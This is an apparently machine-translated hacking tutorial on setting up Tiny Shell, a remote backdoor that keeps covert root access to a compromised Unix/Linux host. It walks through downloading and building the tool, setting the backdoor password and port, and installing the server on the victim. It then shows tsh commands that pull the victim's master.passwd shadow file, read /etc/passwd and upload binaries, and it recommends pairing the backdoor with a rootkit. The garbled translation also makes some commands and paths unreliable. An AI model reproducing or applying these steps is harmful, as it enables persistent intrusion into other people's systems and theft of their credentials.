Lightweight Shell tools in Unix/Linux systems

By: dahubaobao

I. Preface
With the development of the Internet, more and more Unix/Linux systems are used, and it is no longer difficult to intrude into a Unix/Linux system. Usually, after the intrusion is successful, one or several backdoors will be left for re-entry. For Unix/Linux systems, there are many types of backdoors and there are some preliminary modifications. rhosts file, copy a Shell to a hidden directory, modify the etc/passwd file and add the user. The more advanced one is the kernel module backdoor (Rootkit), which is the highest level of backdoor in Unix/Linux systems. It may be the most concealed, but today I am not talking about Rootkit, because it is too complex to use, it is even more difficult for people without Unix/Linux experience. Tiny Shell, as a lightweight Shell tool running on Unix/Linux systems, is not only small, but also supports some other good features. For details, see the following.

II. Application
1. Introduction to Tiny Shell
Tiny Shell is a lightweight standard remote Shell tool that provides remote command execution (including Rlogin, Telnet, and Ssh) and file transmission (upload and download) functions ), supports single-byte Pseudo terminals such as Pseudo-Terminal Pairs (pty/tty. And uses powerful 160-bit RC4 encryption to circumvent sniffer detection with powerful encryption and authentication for AES-128 + HMAC-SHA1. Support FreeBSD, NetBSD, OpenBSD, Solaris, SunOS, HP-UX, IRIX, Cygwin, Linux and other systems.

2. Tiny Shell application
Test environment:
Local: OpenBSD 3.4 IP: 192.168.0.40
Target: FreeBSD 4.9 stable ip: 192.168.0.20

Download Tiny Shell, decompress the package, and modify the source code so that the tool can better meet our requirements.
# Fetch http://www.ringz.org/tsh-0.6.tgz
# Tar zxvf tsh-0.6.tgz
# Cd tsh-0.6
# Ls
ChangeLog README aes. h pel. h sha1.h tsh. h
Makefile aes. c pel. c sha1.c tsh. c tshd. c
# Vi tsh. h
Char * secret = "replace with your password ";
// Change the password for connecting to the backdoor to dahubaobao. The main program of this backdoor is tsh. c. first look at the source code below
If (password = NULL)
{
/* 1st try, using the built-in secret key */
Ret = pel_client_init (server, secret );
If (ret! = PEL_SUCCESS)
{
Close (server );
/* Secret key invalid, so ask for a password */
Password = getpass ("Password :");
Goto connect;
}
}
// Focus on this: ret = pel_client_init (server, secret );
The secret variable is used as the parameter, that is, the password required to connect to the backdoor. Now I know why I modified the tsh. h.

# Define SERVER_PORT 7586
// The webshell listening port, which can be modified arbitrarily

If (argc = 5 &&! Strcmp (argv [2], "get "))
{
Action = GET_FILE;
}
If (argc = 5 &&! Strcmp (argv [2], "put "))
{
Action = PUT_FILE;
}
// This backdoor does not provide help information. Therefore, we can see that Get is downloaded and Put is uploaded. Of course, if you like it, you can modify it on your own. In addition, if you want the backdoor to output help information, you can add a Printf statement to output help information. Here is the simplest method, which is executed without parameters. /tsh, the system prompts gethostbyname failed ., view the source code and find fprintf (stderr, "gethostbyname failed. "); this code, you may think of it smartly, is to modify gethostbyname failed. the help information you want. /tsh, the help information is automatically output. Well, it's also a disguised modification. Next, compile the source code.

# Make
Please specify one of these targets:

Make linux
Make freebsd
Make openbsd
Make netbsd
Make cygwin
Make sunos
Make irix
Make hpux
Make osf
# Make openbsd
// Make the appropriate selection based on your system, and compile it in 10 seconds (1 ).
Then, two executable files, one client and one server, are generated in the current directory: tsh and tshd. Copy tshd to the target system (FreeBSD), and then execute./tshd to complete the installation. To better indicate the environment I use, return to the local to execute the id command and find that the UID of this user is 1000, which is a common user. /tsh 192.168.0.20 to connect to the target host (for test convenience, I will not add a password). Well, now we get a Shell with the Root permission and then use the id command (note, this is on the target host). We can see that UID = 0, which is the Root permission! Run the uname-a command and the ECHO is the FreeBSD system. It can be seen that a backdoor is successfully connected and logged on to the system (2 ). In addition, the backdoor can also insert Shell commands during connection. The syntax is. /tsh 192.168.0.20 "command", such. /tsh 192.168.0.20 "cat etc/passwd". This command is used to connect to the target host of 192.168.0.20 and then run the cat etc/passwd command, we can see all the passwd files on the target host (3 ). However, you must note that you have not logged on to the target host in this form. Instead, you only need to connect to the target host and then insert a Shell command.

Now let's take a look at how to use upload and download. From the source code, we know that the key word for uploading is Put and the key word for downloading is Get. Okay. Let's first take a look at how to upload a file and execute ". /tsh 192.168.0.20 put file name target host Directory "to complete the upload, but note that the file should be in the current directory, that is, the same directory as tsh. A back binary file I uploaded. /tsh 192.168.0.20 put back/. This command uploads the back file to the target root directory, and then I will use it again. /tsh 192.168.0.20 connect to the target host. ls checks whether the back has been uploaded to the target host (4! Let's take a look at the downloaded file. Its syntax is ". /tsh 192.168.0.20 get local directory of the target file ". Now we can get the most sensitive file ---- master. passwd (shadow file in Linux ). Run. /tsh 192.168.0.20 get etc/master. passwd/home/dahubaobao, which means to download the master of the target host. passwd file to the local/home/dahubaobao directory, and then use ls to view it. passwd is downloaded to the Local Machine (5) and then the vi master. passwd (6), haha, the user's encrypted password is close at hand. Note: The user password of FreeBSD is encrypted with MD5.

Summary
Tiny Shell, as a small Shell tool, is no inferior to other similar Shell tools and supports most Unix/Linux systems. It is definitely worth a try. Of course, this backdoor is not concealed. We can combine it with Rootkit for reinforcement (the Rootkit also provides Shell tools, but it cannot be compared with Tiny Shell. If you don't believe it, you can try it on your own ), to use Rootkit, go to google to find the answer.